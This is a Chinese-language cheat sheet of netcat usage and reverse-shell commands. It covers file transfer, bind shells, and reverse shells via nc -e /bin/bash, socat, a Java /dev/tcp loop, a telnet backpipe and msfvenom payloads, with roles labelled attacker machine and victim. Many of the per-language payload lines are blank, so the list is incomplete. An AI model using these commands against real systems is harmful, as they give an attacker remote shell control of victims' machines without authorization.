1.1发送文件(公网发内网)
文件发送端:
nc -lp 6666 < 文件
文件接收端:
nc 发送端ip 发送端端口 > 新文件
1.2发送文件(内网发公网)
文件发送端:
nc -lp 6666 > 文件
文件接收端:
nc 发送端ip 发送端端口 < 新文件
2.聊天
发送端:
接收端:
nc 发送端ip 发送端端口
3.1发送shell
发送端(公网服务器):
nc -lvvp 发送端port -e /bin/bash
接收端:
nc 发送端ip 发送端port
3.2反弹shell
接收端:
发送端(内网网服务器):
nc 接收端ip 接收端端口 -e /bin/bash
4.bash反弹
接收端(hackip,公网):
nc -lvvp 端口
发送端(受害者):
发送端(受害者):
5.1socat反弹(tcp)
接收端(攻击机):
./socat TCP-LISTEN:端口 -
发送端(靶机):
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口
5.2socat反弹(udp)
接收端:
发送端:
6.python反弹
接收端(攻击机,外网):
nc -lvvp 端口
发送端(靶机):
7.PHP反弹
接收端:
nc -lvvp 端口
发送端:
8.JAVA反弹
接收端:
nc -lvvp 端口
发送端:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/攻击者ip/端口;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
9.perl反弹
接收端:
nc -lvvp 端口
发送端:
10.ruby反弹
接收端:
nc -lvvp 端口
发送端:
11.telnet反弹
接收端:
nc -lvvp 端口
发送端:
mknod backpipe p && telnet 攻击者ip 端口 0<backpipe | /bin/bash 1>backpipe
12.lua反弹(安装lua环境:apt-get install lua*)
接收端:
nc -lvvp 端口
发送端:
13.awk反弹
接收端:
nc -lvvp 端口
发送端:
14.ksh反弹
接收端:
nc -lvvp 端口
发送端:
15.msfvenom生成各种payload
接收端:
nc -lvvp 端口
查找payload:
生成payload:
msfvenom -p cmd/unix/reverse_模块 lhost=接收端ip lport=接收端端口 R